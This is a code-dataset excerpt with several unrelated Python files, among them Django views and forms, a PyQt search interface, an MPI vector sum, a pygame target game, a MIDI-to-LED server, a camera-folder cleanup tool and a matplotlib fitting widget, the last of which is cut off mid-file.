dt.import2dArray(\"../data/\" + data_type + \"/nnet/clusters/\" + file_name + \".txt\")\n\n#compareTopEntitiesOnRanking(ranking1, ranking2, cluster_names, cluster_length, top_x, output=True, reverse=reverse, from_top=from_top)\n\ncompareEntityOnCluster(ranking1, ranking2, cluster_names, entity_names, entity_name=\"house\", cluster_name=\"classical\")\n\"\"\"\n\"\"\"\ndata_type = \"movies\"\nclassify = \"genres\"\nfile_name = \"places100\"\nrepresentation = dt.import2dArray(\"../data/\"+data_type+\"/nnet/spaces/\"+ file_name + \"-\"+classify+\".txt\", \"f\")\nentity_names = dt.import1dArray(\"../data/\" + data_type + \"/classify/\"+classify+\"/available_entities.txt\", \"s\")\n\"\"\"\n\"\"\"\ndef treeImages(loc, names,class_name):\n for n in names:\n copyfile(loc + class_name + \" \" + n + \"CV0\" + \".png\", output_loc + class_name + \" \" + n + \"CV0\" + \".png\")\n \"\"\"\n\"\"\"\nfile_name = \"wines100-\" + classify\nrepresentation = import2dArray(\"../data/\"+data_type+\"/nnet/spaces/\"+ file_name + \".txt\", \"f\")\nentity_names = import1dArray(\"../data/\" + data_type + \"/classify/\"+classify+\"/available_entities.txt\", \"s\")\n\"\"\"\n\"\"\"\ndata_type = \"placetypes\"\nclass_name = \"TravelAndTransport\"\nname1 = \"places NONNETCV5S4 SFT0 allL050kappa KMeans CA100 MC1 MS0.4 ATS2000 DS200 foursquare tdev3\"\nname2 = \"places NONNETCV5S4 SFT0 allL050kappa KMeans CA100 MC1 MS0.4 ATS2000 DS200 foursquare tdev3FT BOCFi IT1300\"\nnames = [name1, name2]\nloc = \"../data/\" + data_type + \"/rules/tree_images/\"\noutput_loc = \"../data/\" + data_type + \"/rules/tree_investigate/\"\ntreeImages(loc, names, class_name)\n\"\"\"\n\ndef topEntities(ranking, ens, id=-1):\n ens = np.asarray(ens)\n ranking = np.asarray(ranking)\n sorted_entities = []\n sorted_values = []\n for r in ranking:\n sorted_entities.append(list(reversed(ens[np.argsort(r)])))\n sorted_values.append(list(reversed(r[np.argsort(r)])))\n if id > -1:\n print(sorted_entities[id])\n print(sorted_values[id])\n else:\n for s in sorted_entities:\n print(s)\n\"\"\"\ndata_type = \"placetypes\"\nfile_name = \"places NONNETCV1S0 SFT0 allL050ndcg KMeans CA200 MC1 MS0.4 ATS2000 DS400 opencycFT BOCFi NTtanh1 NT1300linear3.txt\"\nranking_fn = \"../data/\" + data_type+\"/rules/rankings/\" + file_name\n#ranking = dt.import2dArray(ranking_fn)\nentities = dt.import1dArray(\"../data/\" + data_type + \"/nnet/spaces/entitynames.txt\")\n\n#topEntities(ranking, entities)\n#print(\"------------------------------------------------\")\ncompare_fn = \"places NONNETCV1S0 SFT0 allL050ndcg KMeans CA200 MC1 MS0.4 ATS2000 DS400.txt\"\nranking_fn = \"../data/\" + data_type+\"/rank/numeric/\" + compare_fn\nranking = dt.import2dArray(ranking_fn)\n#topEntities(ranking, entities)\n\"\"\"","sub_path":"src/vis/top_entities_text.py","file_name":"top_entities_text.py","file_ext":"py","file_size_in_byte":14995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"283312497","text":"from django import forms\n\nfrom applications.firewalls.models import firewalls\n\n\nclass FirewallsForm(forms.ModelForm):\n\n\tclass Meta:\n\t\tmodel = firewalls\n\n\t\tfields = [\n\t\t\t'geom',\n\t\t\t'type',\n\t\t\t'descript',\n\t\t]\n\t\tlabels = {\n\t\t\t'geom': 'Geometry',\n\t\t\t'type': 'Type of Firewall',\n\t\t\t'descript': 
'Description',\n\t\t}","sub_path":"signis_osgis/signis/applications/firewalls/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"20992457","text":"\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nimport SearchEngine\n\n\nclass Ui_MainWindow(object):\n    def setupUi(self, MainWindow):\n        MainWindow.setObjectName(\"MainWindow\")\n        MainWindow.resize(1162, 893)\n\n        self.data = SearchEngine.extractPickle()\n\n        self.centralwidget = QtWidgets.QWidget(MainWindow)\n        self.centralwidget.setObjectName(\"centralwidget\")\n        self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)\n        self.lineEdit.setGeometry(QtCore.QRect(190, 40, 781, 41))\n        self.lineEdit.setObjectName(\"lineEdit\")\n\n        f = self.lineEdit.font()\n        f.setPointSize(18)  # QFont.setPointSize() takes an int; passing 18.2 raises a TypeError in PyQt5\n        self.lineEdit.setFont(f)\n\n        self.pushButton = QtWidgets.QPushButton(self.centralwidget)\n        self.pushButton.setGeometry(QtCore.QRect(990, 40, 131, 41))\n        self.pushButton.setIcon(QtGui.QIcon(\"Go.png\"))\n        self.pushButton.setIconSize(QtCore.QSize(150, 100))\n        QtGui.QGuiApplication.processEvents()\n        self.labeling = QtWidgets.QLabel(self.centralwidget)\n        self.labeling.setGeometry(QtCore.QRect(30, 40, 131, 41))\n        w = self.labeling.width()\n        h = self.labeling.height()\n        pixmap = QtGui.QPixmap(\"Search.png\")\n        self.labeling.setPixmap(pixmap.scaled(w, h, QtCore.Qt.KeepAspectRatio)) # setPixmap(QtGui.setPixmap(pixmap))\n        self.labeling.setObjectName(\"label\")\n        QtGui.QGuiApplication.processEvents()\n\n        self.textBrowser = QtWidgets.QTextBrowser(self.centralwidget)\n        self.textBrowser.setGeometry(QtCore.QRect(30, 110, 1091, 711))\n        self.textBrowser.setObjectName(\"textBrowser\")\n\n\n        font = QtGui.QFont()\n        font.setPointSize(17)\n        self.textBrowser.setFont(font)\n\n        MainWindow.setCentralWidget(self.centralwidget)\n        self.menubar = QtWidgets.QMenuBar(MainWindow)\n        self.menubar.setGeometry(QtCore.QRect(0, 0, 1162, 22))\n        self.menubar.setObjectName(\"menubar\")\n        MainWindow.setMenuBar(self.menubar)\n        self.statusbar = QtWidgets.QStatusBar(MainWindow)\n        self.statusbar.setObjectName(\"statusbar\")\n        MainWindow.setStatusBar(self.statusbar)\n\n        self.retranslateUi(MainWindow)\n        QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n        self.pushButton.clicked.connect(self.buttonClicked)\n\n    def retranslateUi(self, MainWindow):\n        _translate = QtCore.QCoreApplication.translate\n        MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n\n    def buttonClicked(self):\n        self.textBrowser.clear()\n        query = self.parseQuery()\n        QtGui.QGuiApplication.processEvents()\n        urlData = self.urlData(query, self.data)\n        output = SearchEngine.results(urlData)\n        self.textBrowser.setText(output)\n\n    def parseQuery(self):\n        query = self.lineEdit.text().split()\n        return query\n\n    def urlData(self, query, data):\n        documents = SearchEngine.searchIndex(query, data)\n        urlData = SearchEngine.processDocs(documents)\n        return urlData\n\n    def setImage(self):\n        label = QtWidgets.QLabel(self)\n        pixmap = QtGui.QPixmap(\"Search.png\")\n        label.setPixmap(pixmap)  # QtGui has no setPixmap(); pass the QPixmap to the label directly\n\n\nif __name__ == \"__main__\":\n    import sys\n\n    app = QtWidgets.QApplication(sys.argv)\n    MainWindow = QtWidgets.QMainWindow()\n    ui = Ui_MainWindow()\n    ui.setupUi(MainWindow)\n    MainWindow.show()\n    sys.exit(app.exec_())\n","sub_path":"UISearchEngine.py","file_name":"UISearchEngine.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"536029951","text":"# -*- coding: utf-8 -*-\nimport os\n\n\"\"\"\n General configuration.\n\"\"\"\nCWD = os.path.dirname(os.path.abspath(__file__))\n\nRUNTIME_DIR = os.path.join(CWD, 'runtime')\n\nIMAGES_DIR = os.path.join(RUNTIME_DIR, 'images')\nREFRESH_TOKEN_PATH = os.path.join(RUNTIME_DIR, 'refresh_token.txt')\n\nMAX_RECONNECT_RETRIES = 5\n\n\"\"\"\n Command specific configuration.\n\"\"\"\n\n\"\"\"\n /gif\n\"\"\"\nGIFYCAT_SEARCH_URL = 'https://api.gfycat.com/v1test/gfycats/search'\nMAX_GIF_SIZE_IN_MB = int(os.environ.get('ROBORONYA_MAX_GIF_SIZE', '5'))\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"380403010","text":"from django.shortcuts import render, redirect, get_object_or_404, get_list_or_404\nfrom django.http import JsonResponse\nfrom django.views.decorators.http import require_POST\nfrom .models import Student, Professor, Greeting, Comment, Message\n\ndef index(request):\n professor = Professor.objects.get(pk=1)\n context = {\n 'professor': professor,\n }\n return render(request, 'ssafy5_3/index.html', context)\n\ndef messages(request):\n context = {\n\n }\n return render(request, 'ssafy5_3/messages.html', context)\n\ndef collegues(request):\n students = Student.objects.all()\n juan = Professor.objects.get(pk=1)\n context = {\n 'students': students,\n 'juan': juan,\n }\n return render(request, 'ssafy5_3/collegues.html', context)\n\n\ndef greetings(request):\n greetings = get_list_or_404(Greeting)\n serialized_greetings = []\n for greeting in greetings:\n tmp = greeting.content.split('\\n\\n')\n greetings_content_br = []\n for s in tmp:\n greetings_content_br.extend(s.split('\\n'))\n greetings_content_br.append(' ')\n greetings_content_br.pop()\n \n serialized_greetings.append({\n 'id': greeting.pk,\n 'content': greetings_content_br,\n 'created_at': greeting.created_at,\n })\n juan = get_object_or_404(Professor, pk=1)\n context = {\n 'juan': juan,\n 'greetings': serialized_greetings,\n }\n return render(request, 'ssafy5_3/greetings.html', context)\n\n\n# Reward 페이지의 open에 필요한 coin 개수 불러오기\ndef load_coin(request):\n professor = get_object_or_404(Professor, pk=1)\n coin = professor.coins\n not_opened_num = len(get_list_or_404(Message, is_locked=True))\n # DB의 coin 개수와 아직 열리지 않은 메세지 개수 중에서 더 적은 쪽을 반환한다.\n context = {\n 'coin' : min(coin, not_opened_num)\n }\n return JsonResponse(context)\n\n# DB에 있는 모든 메세지 불러오기\ndef load_messages(request):\n messages = get_list_or_404(Message)\n serialized_messages = []\n for message in messages:\n message_content_br = message.content.replace('\\n','
')\n serialized_messages.append({\n 'id': message.pk,\n 'name': message.student.name if message.student else '',\n 'content': message_content_br,\n 'isLocked' : message.is_locked,\n 'textSize' : 1 if (len(message_content_br)>60) else ( 2 if (len(message_content_br)>40) else 3)\n })\n context = {\n 'messages':serialized_messages,\n }\n return JsonResponse(context)\n\ndef open_message(request, id):\n # 교수님 코인 1개 감소\n professor = get_object_or_404(Professor, pk=1)\n professor.coins = professor.coins - 1\n professor.save()\n # 메세지 오픈 여부 DB 변경\n message = get_object_or_404(Message, pk=id)\n message.is_locked= False\n message.save()\n context = {\n }\n return JsonResponse(context)\n\n# 입력한 개수 만큼의 coin을 추가한다.\n@require_POST\ndef insert_coin(request, coin_num):\n professor = get_object_or_404(Professor, pk=1)\n professor.coins = professor.coins + coin_num\n professor.save()\n\n stage_num = 1 if coin_num==9 else coin_num-9\n return redirect('game:rewards', stage_num)\n \ndef credit(request):\n return render(request, 'ssafy5_3/credit.html')","sub_path":"ssafy5_3/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"218870840","text":"#!/usr/bin/env python\n\nimport os\nimport numpy as np\nimport time\nfrom mpi4py import MPI\n\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\ndata_in_dir = os.path.join(os.environ['HOME'], 'Data', 'in', 'vsum')\ntmp_data_dir = os.path.join(os.environ['HOME'], 'tmp', 'vsum')\na_file = os.path.join(data_in_dir, 'a.npy')\nb_file = os.path.join(data_in_dir, 'b.npy')\nc_file = os.path.join(tmp_data_dir, 'slice-%d.npy' % rank)\na = np.load(a_file, mmap_mode='r')\nb = np.load(b_file, mmap_mode='r')\nN = len(a)\nM = int((N + size - 1) / size)\ndef vector_add():\n def add(slice_a, slice_b):\n slice_c = np.empty_like(slice_a)\n start = time.time()\n slice_c = slice_a + slice_b\n end = time.time()\n return (slice_c, end - start)\n\n c = np.memmap(c_file, dtype=np.float32, shape=(M,), mode='w+')\n slice_low = M * rank\n slice_high = M * (rank + 1)\n #print(\"%d: %d(%d/%d)\" % (rank, M, slice_low, slice_high))\n result = add(a[slice_low:slice_high], b[slice_low:slice_high])\n np.append(c, result[0])\n\n return (c, result[1])\n #return c\n\ntotal_start = time.time()\nnode_calc_time = vector_add()[1]\n#vector_add()\ntotal_end = time.time()\nprint(\"%d %s %s\" % (rank, str(total_end-total_start), str(node_calc_time)))\n","sub_path":"vector_sum_mpi.py","file_name":"vector_sum_mpi.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"513391525","text":"import pygame\r\nfrom pygame.sprite import Group\r\n\r\nfrom settings import Settings\r\nfrom game_stats import GameStats\r\nfrom ship import Ship\r\nfrom rectangle import Rectangle\r\nfrom button import Button\r\nimport game_functions as gf\r\n\r\ndef run_game():\r\n # Initialize game and create a screen object.\r\n pygame.init()\r\n ai_settings = Settings()\r\n screen = pygame.display.set_mode(\r\n (ai_settings.screen_width, ai_settings.screen_height))\r\n pygame.display.set_caption(\"Target Practice\")\r\n \r\n # Make the Play button\r\n play_button = Button(ai_settings, screen, \"Play\")\r\n \r\n # Create an instance to store game statistics.\r\n stats = GameStats(ai_settings)\r\n \r\n # Make a ship, a group of bullets, and a rectangle object\r\n ship = Ship(ai_settings, screen)\r\n bullets = 
Group()\r\n rectangle = Rectangle(ai_settings, screen)\r\n \r\n # Start the main loop for the game\r\n while True:\r\n gf.check_events(ai_settings, screen, stats, play_button, ship,\r\n rectangle, bullets)\r\n if stats.game_active:\r\n ship.update()\r\n gf.update_bullets(stats, bullets)\r\n gf.update_rectangle(ai_settings, stats, rectangle, bullets)\r\n gf.update_screen(ai_settings, screen, stats, ship, rectangle, \r\n bullets, play_button)\r\n \r\nrun_game()\r\n","sub_path":"python-crash-course/exercises/chapter-14/14-3/target_practice.py","file_name":"target_practice.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"400357428","text":"#!/usr/bin/env python3\n\"\"\"\nMax RPi\n============\nVcc -> Pin 2\nGnd -> Pin 6\nDin -> Pin 19\nCs -> Pin 24\nClk -> Pin 23\n\"\"\"\nimport time\nimport sys\nimport random\nimport traceback\nimport rx\nimport rx.operators as ops\nimport socket_fix\n\nfrom luma.core.interface.serial import spi, noop\nfrom luma.core.render import canvas\nfrom luma.core.virtual import viewport\nfrom luma.led_matrix.device import max7219\nfrom blist import blist\nfrom rx.scheduler import NewThreadScheduler\nfrom mido.sockets import PortServer\n\nfrom gfx import UpLine, LeftLine, RightLine, DownLine, Point, Up, Down, Left, Right\nfrom mapping import standard_mapping, randomize, randomize_persist\n\n\nclass Server(object):\n def __init__(self, host, port, note_mapper):\n serial = spi(port=0, device=0, gpio=noop(), cs_high=True)\n device = max7219(serial)\n self._virtual = viewport(device, width=8, height=8)\n self._entities = blist([])\n self._server = PortServer(host, port)\n self._mapper = note_mapper\n\n\n def run(self):\n print('Starting server {}'.format(self._server))\n\n self._subscription = rx.create(self._receive).pipe(\n ops.subscribe_on(NewThreadScheduler()),\n ops.map(lambda msg: self._mapper(msg)),\n ops.filter(lambda gfx: gfx is not None),\n ).subscribe(lambda gfx: self._entities.append(gfx))\n\n\n print('Start')\n while True:\n with canvas(self._virtual) as draw:\n for entity in self._entities:\n entity.render(draw)\n entity.update()\n\n self._entities[:] = [ent for ent in self._entities if not ent.can_destroy()]\n time.sleep(0.010)\n\n\n def _receive(self, observable, scheduler):\n while True:\n try:\n client = self._server.accept()\n print('Connected from {}'.format(client))\n for msg in client:\n observable.on_next(msg)\n except Exception as exp:\n traceback.print_exc()\n print('Connection Closed')\n\n\n def _append(self, note):\n self._entities.append(note)\n\n\nif __name__ == '__main__':\n server = Server(sys.argv[1], int(sys.argv[2]), standard_mapping)\n server.run()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"466297923","text":"import time\nimport json\nimport sys\nimport asyncio\nfrom datetime import datetime\nimport os\nimport shutil\n\nConfig = {\n 'DaysOldTolerated': 7,\n 'MonthsOldTolerated': 0,\n 'YearsOldTolerated': 0,\n 'RefreshRate': 300,\n 'CameraDirectories': [\"\",\"\"],\n 'LaunchOptions': [\"\"],\n }\n\n\ntitle = \" CameraMan ::: BUILT {12:48 AM :: 10/18/2018} \"\nos.system(\"title CM ::: BUILT {1:06 AM :: 10/18/2018}\")\n#Coroutine Taking Over Entire Script \n#async def luuuup():\n# title = \" CM ::: BUILT {12:48 AM :: 10/18/2018} \"\n# def shift(msg):\n# msg = msg[1:] + msg[0]\n# return(msg)\n# 
while True:\n# await asyncio.sleep(0.09)\n# title = shift(title)\n# os.system(\"title \"+\"[\"+title+\"]\")\n#asyncio.run(luuuup())\n\n\n\n\n## Launch Options: \"skipMenu\",\"runOnce\"\n\nCurrentDirectory = \"\"\n\nInstallPath = os.path.join(os.getenv('programdata'), 'CameraMan')\nif not os.path.isdir(InstallPath):\n os.makedirs(InstallPath)\n\ntry:\n with open(InstallPath+\"/CameraMan.cfg\", 'r') as f:\n Config = json.load(f)\nexcept:\n with open(InstallPath+\"/CameraMan.cfg\", 'w') as f:\n json.dump(Config, f)\n\ndef SaveSettings():\n global Config\n with open(InstallPath+\"/CameraMan.cfg\", 'w') as f:\n json.dump(Config, f)\n\ndef LoadSettings():\n global Config\n with open(InstallPath+\"/CameraMan.cfg\", 'r') as f:\n Config = json.load(f)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef run():\n while True:\n LoadSettings()\n\n for i in Config[\"CameraDirectories\"]:\n global CurrentDirectory\n CurrentDirectory = i\n clean(os.listdir(i))\n LoadSettings()\n for i in Config[\"LaunchOptions\"]:\n if i == \"runOnce\":\n sys.exit(0)\n RefreshTime = Config[\"RefreshRate\"]\n\n print(\"----------------------------------------------\")\n ViewingTime = 10\n for i in range(1,10):\n time.sleep(1)\n print(str(10 - i)+\" Seconds Left To View Results.\")\n os.system(\"cls\")\n print(\"Refreshing In: \"+str(RefreshTime)+\" Seconds.\")\n for i in range(1,RefreshTime):\n os.system(\"cls\")\n print(str(RefreshTime - i)+\" Seconds Until Next Purge.\")\n time.sleep(1)\n\n\n\n\ndef getDate():\n year = time.strftime(\"%Y\")\n day = time.strftime(\"%d\")\n month = time.strftime(\"%m\")\n return([year,month,day])\ndef stringifylist(x):\n str = \"\"\n for i in x:\n str = str+i\n return str\ndef clean(listyBoi):\n LoadSettings()\n for i in listyBoi:\n date = getDate()\n year = date[0]\n month = date[1]\n day = date[2]\n i_year = i[:4]\n i_month = i[4:-2]\n i_day = i[6:]\n\n i_date = [i_year,i_month,i_day]\n delete = False\n reasons = []\n\n if int(year) - int(i_year) > Config[\"YearsOldTolerated\"]:\n reasons.insert(len(reasons)+1,\"Too Old By Years\")\n delete = True\n elif int(month) - int(i_month) > Config[\"MonthsOldTolerated\"]:\n reasons.insert(len(reasons)+1,\"Too Old By Months\")\n delete = True\n elif int(day) - int(i_day) > Config[\"DaysOldTolerated\"]:\n reasons.insert(len(reasons)+1,\"Too Old By Days\")\n delete = True\n for i in reasons:\n print(\"[Deleting: (\"+stringifylist(i_date)+\") because of: (\"+i+\")\")\n if len(reasons) > 0:\n shutil.rmtree(CurrentDirectory+\"/\"+stringifylist(i_date))\n # os.rmdir(CurrentDirectory+\"/\"+stringifylist(i_date))\n else:\n print(\"Nothing In \"+CurrentDirectory+\" Matches Deletion Requirements.\")\n\n\ndef drawSettingsMenu():\n os.system(\"cls\")\n print(\"---------------------------------\")\n print(\"\\n\")\n print(\"\\n\")\n print(\"[1]: RefreshRate\")\n print(\"[2]: DaysOldTolerated\")\n print(\"[3]: MonthsOldTolerated\")\n print(\"[4]: YearsOldTolerated\")\n print(\"[5]: CameraDirectories\")\n print(\"[6]: Return\")\n print(\"\\n\")\n print(\"\\n\")\n print(\"---------------------------------\")\n choice = input(\">: \")\n if choice == str(1):\n newValue = input(\"Enter a new value: \")\n try:\n int(newValue)\n if int(newValue) <= 0:\n raise Exception(\"cannot be lower or equal to 0\")\n except Exception as Ex:\n if Ex.args[0] == \"cannot be lower or equal to 0\":\n input(\"[Error]: Cannot be lower or equal to 0, Press any key to continue.\")\n else:\n print(\"[Error]: Unknown Error, Press any key to continue.\")\n drawSettingsMenu()\n\n\n Config[\"RefreshRate\"] = 
newValue\n SaveSettings()\n elif choice == str(2):\n newValue = input(\"Enter a new value: \")\n try:\n int(newValue)\n if int(newValue) <= 0:\n raise Exception(\"cannot be lower or equal to 0\")\n except Exception as Ex:\n if Ex.args[0] == \"cannot be lower or equal to 0\":\n input(\"[Error]: Cannot be lower or equal to 0, Press any key to continue.\")\n else:\n print(\"[Error]: Unknown Error, Press any key to continue.\")\n drawSettingsMenu()\n\n\n Config[\"DaysOldTolerated\"] = newValue\n SaveSettings()\n elif choice == str(3):\n newValue = input(\"Enter a new value: \")\n try:\n int(newValue)\n if int(newValue) < 0:\n raise Exception(\"cannot be lower than 0\")\n except Exception as Ex:\n if Ex.args[0] == \"cannot be lower than 0\":\n input(\"[Error]: Cannot be lower than 0, Press any key to continue.\")\n else:\n print(\"[Error]: Unknown Error, Press any key to continue.\")\n drawSettingsMenu()\n\n\n Config[\"MonthsOldTolerated\"] = newValue\n SaveSettings()\n elif choice == str(4):\n newValue = input(\"Enter a new value: \")\n try:\n int(newValue)\n if int(newValue) < 0:\n raise Exception(\"cannot be lower than 0\")\n except Exception as Ex:\n if Ex.args[0] == \"cannot be lower than 0\":\n input(\"[Error]: Cannot be lower than 0, Press any key to continue.\")\n else:\n print(\"[Error]: Unknown Error, Press any key to continue.\")\n drawSettingsMenu()\n Config[\"YearsOldTolerated\"] = newValue\n SaveSettings()\n elif choice == str(5):\n print(\" ---------------------------------\")\n print(\" [1]: Add Item To List\")\n print(\" [2]: Remove Item From List\")\n print(\" [3]: List Items\")\n print(\" ---------------------------------\")\n newValue = input(\":> \")\n if newValue == str(1):\n newValue = input(\"Enter New Directory: \")\n Chars = []\n it = 0\n for i in newValue:\n it += 1\n if it > 2:\n print(i + \" > 2\")\n char = i\n if char == \"\\\\\": # Escape the escape character.\n char = \"/\"\n Chars.append(char)\n else:\n print(i + \" else\")\n Chars.append(i)\n newValue = \"\"\n for i in Chars:\n newValue += i\n Config[\"CameraDirectories\"].insert(len(Config[\"CameraDirectories\"])+1,newValue)\n elif newValue == str(2):\n for i in range(len(Config[\"CameraDirectories\"])):\n print(\"[\"+str(i)+\"]\"+\": \"+Config[\"CameraDirectories\"][i])\n newValue = input(\"Delete #: \")\n\n try:\n int(newValue)\n if int(newValue) < 0:\n raise Exception(\"Index too low\")\n elif int(newValue) > len(Config[\"CameraDirectories\"]):\n raise Exception(\"Index too high\")\n except Exception as Ex:\n if Ex.args[0] == \"Index too low\":\n input(\"[Error]: Index too low, Press any key to continue.\")\n elif Ex.args[0] == \"Index too high\":\n input(\"[Error]: Index too high, Press any key to continue.\")\n else:\n input(\"Unexpected Error, Press any key to continue.\")\n drawSettingsMenu()\n\n\n Config[\"CameraDirectories\"].remove(Config[\"CameraDirectories\"][int(newValue)])\n elif newValue == str(3):\n for i in range(len(Config[\"CameraDirectories\"])):\n print(\"[\"+str(i)+\"]\"+\": \"+Config[\"CameraDirectories\"][i])\n input(\"Press any key to continue\")\n SaveSettings()\n elif choice == str(6):\n drawMenu()\n drawSettingsMenu()\n\n\n\ndef drawMenu():\n os.system(\"cls\")\n print(\"---------------------------------\")\n print(\"\\n\")\n print(\"\\n\")\n print(\"[1]: Settings\")\n print(\"[2]: Run\")\n print(\"\\n\")\n print(\"\\n\")\n print(\"---------------------------------\")\n choice = input(\":> \")\n errored = False\n try:\n int(choice)\n errored = False\n except ValueError:\n errored = 
True\n print(\"ValueError\")\n except:\n errored = True\n print(\"Error\")\n if errored != True:\n if int(choice) == 1:\n drawSettingsMenu()\n elif int(choice) == 2:\n run()\n else:\n print(\"else\")\n drawMenu()\n else:\n drawMenu()\n\n\n\nLoadSettings()\n\nfor i in Config[\"LaunchOptions\"]:\n if i == \"skipMenu\":\n run()\n break\ndrawMenu()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"184611440","text":"# coding: utf-8\n\n\nclass TestgresConfig:\n \"\"\"\n Global config (override default settings).\n\n Attributes:\n cache_initdb: shall we use cached initdb instance?\n cache_pg_config: shall we cache pg_config results?\n cached_initdb_dir: shall we create a temp dir for cached initdb?\n node_cleanup_full: shall we remove EVERYTHING (including logs)?\n error_log_lines: N of log lines to be included into exception (0=inf).\n \"\"\"\n\n cache_initdb = True\n cache_pg_config = True\n cached_initdb_dir = None\n node_cleanup_full = True\n error_log_lines = 20\n\n\ndef configure_testgres(**options):\n \"\"\"\n Configure testgres.\n Look at TestgresConfig to check what can be changed.\n \"\"\"\n\n for key, option in options.items():\n setattr(TestgresConfig, key, option)\n","sub_path":"testgres/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"205474068","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: misiak\n\n\"\"\"\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import TextBox, Button\nimport numpy as np\n\nimport mcmc_red as mcr\n\nfrom data_classes import Data_mmr3\nfrom model_classes import Model_ruo2\n\n\nclass Manual_fitting():\n \n text_boxes = list()\n lines = list()\n func = lambda x: list()\n paramnow = list()\n paraminit = list()\n paramprevious = list()\n fig = None\n callback = lambda x: None\n lines_previous = list()\n \n def _update(self, val):\n # getting the values in the text boxes\n param = [float(tbox.text) for tbox in self.text_boxes]\n \n # no update if the same parameters as before\n if param == self.paramnow:\n print('No update. 
Same param={}'.format(param))\n return None\n \n # saving the previous set of parameters\n self.paramprevious = self.paramnow.copy()\n self.paramnow = param\n \n # evaluating the func for the entered parameters\n new_data = self.func(self.paramnow)\n \n # replacing the ydata of the lines\n for l, nd in zip(self.lines, new_data):\n l.set_ydata(nd)\n \n # autoscale of the axes\n for l in self.lines:\n l.axes.relim()\n l.axes.autoscale(True)\n \n # refresh the figure \n if self.fig:\n self.fig.canvas.draw_idle()\n \n # callback function\n self.callback(param)\n \n # explicit sanity check\n print('Updated with param={}'.format(param))\n \n def _reset(self, event):\n for p0, text_box in zip(self.paraminit, self.text_boxes):\n text_box.set_val(str(p0))\n \n def _previous(self, event):\n # uses an auxiliary list to swap list contents\n param_aux = self.paramprevious.copy()\n self.paramprevious = self.paramnow.copy()\n for ppre, tbox in zip(param_aux, self.text_boxes):\n tbox.set_val(str(ppre))\n # to finish, update, some memoization might be possible here\n self._update(0)\n \n def __init__(self, lines, func, paraminit, callback=None):\n \n self.lines = lines\n self.func = func\n self.fig = lines[0].get_figure()\n self.paraminit = list(paraminit)\n self.nparams = len(paraminit)\n if callable(callback):\n self.callback = callback\n \n # reserving some place for the widgets\n rightl = 0.7\n topl = 0.75\n self.fig.subplots_adjust(right=rightl)\n \n resetax = plt.axes([rightl+0.1, topl, 0.1, 0.045])\n self.reset_button = Button(resetax, 'Reset', hovercolor='0.975')\n self.reset_button.on_clicked(self._reset) \n \n updatax = plt.axes([rightl+0.1, topl-0.05, 0.1, 0.045])\n self.update_button = Button(updatax, 'Update', hovercolor='0.975')\n self.update_button.on_clicked(self._update) \n \n for i,p in enumerate(self.paraminit):\n bot_level = topl-0.1-0.05*i\n axbox = self.fig.add_axes([rightl+0.1, bot_level, 0.15, 0.045])\n text_box = TextBox(axbox, 'param{}'.format(i), initial=str(p)) \n (self.text_boxes).append(text_box)\n\n previax = plt.axes([rightl+0.1, bot_level-0.05, 0.1, 0.045])\n self.previous_button = Button(previax, 'Previous', hovercolor='0.975')\n self.previous_button.on_clicked(self._previous)\n\n # finish with initial update\n self._update(0)\n\n def set_param(self, param):\n # set parameters from command prompt\n for p, tbox in zip(param, self.text_boxes):\n tbox.set_val(str(p)) \n self._update(0)\n \n \nif __name__ == '__main__':\n \n plt.close('all')\n plt.rcParams['text.usetex']=True\n\n data_paths = ('test/MACRT_2019-07-15.csv', 'test/MACRT_2019-07-16.csv')\n# data_paths = ('/home/misiak/Data/data_run59/mmr3/MACRT_2019-09-16.csv', )\n\n data = Data_mmr3(data_paths, version='old')\n model = Model_ruo2()\n \n data_array = data.data_dict['MMR3-205_1_Meas']\n std_array = data_array * 0.01\n\n cover_temp = np.linspace(\n np.min(data.temperature),\n np.max(data.temperature),\n 1000\n )\n\n def model_fun(param):\n term0 = model.function(param, cover_temp)\n term1 = (data_array - model.function(param, data.temperature))/data_array\n return [term0, term1]\n \n model_fun_array = model_fun(model.parameters_0)\n\n def chi2_ruo2(param):\n mod_array = model.function(param, data.temperature)\n chi2_ruo2 = mcr.chi2_simple(mod_array, data_array, std_array)\n return chi2_ruo2\n \n fig = plt.figure()\n axes = fig.subplots(nrows=2, sharex=True)\n \n axes[0].plot(data.temperature, data_array,\n ls='none', marker='+', label='data')\n \n line0, = axes[0].plot(\n cover_temp,\n model_fun_array[0],\n 
